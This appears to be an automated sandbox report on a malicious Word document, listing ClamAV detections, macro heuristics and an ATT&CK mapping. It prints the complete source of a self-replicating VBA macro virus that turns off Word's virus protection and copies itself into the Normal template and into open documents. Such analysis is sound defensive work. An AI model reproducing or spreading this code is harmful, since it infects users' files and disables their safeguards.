MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for initial execution in malicious documents. The macro attempts to modify itself and displays a message box with the text 'Free VicodinES!', suggesting a lure or distraction. The ClamAV detections further confirm its malicious nature.
Heuristics 3
-
ClamAV: Doc.Trojan.Cive-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Cive-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1021 bytes |
SHA-256: 4feb5cb3c88fcacac3c56bcd43c068828cc079562bd6c226ef213d0528868739 |
|||
|
Detection
ClamAV:
Doc.Trojan.Cive-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() Set oldho = MacroContainer.VBProject: Options.VirusProtection = False Set oldhos = oldho.vbcomponents(1): Set oldhost = oldhos.codemodule Set Skip = NormalTemplate: Set newhost = Skip.VBProject.vbcomponents(1).codemodule vcode = "Sub Document_Close()" & vbCr & oldhost.lines(2, oldhost.countoflines) If MacroContainer = NormalTemplate Then Set Skip = ActiveDocument: Set newhost = Skip.VBProject.vbcomponents(1).codemodule vcode = "Sub Document_Open()" & vbCr & oldhost.lines(2, oldhost.countoflines) End If If newhost.countoflines < 5 Then newhost.addfromstring vcode Skip.Save End If If Day(Now()) = Int(Rnd * 31) + 1 Then MsgBox "Free VicodinES!", 64, "Class.FreeVic" End Sub Rem Another virus by Jack Twoflower LineZerØ/Metaphase |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.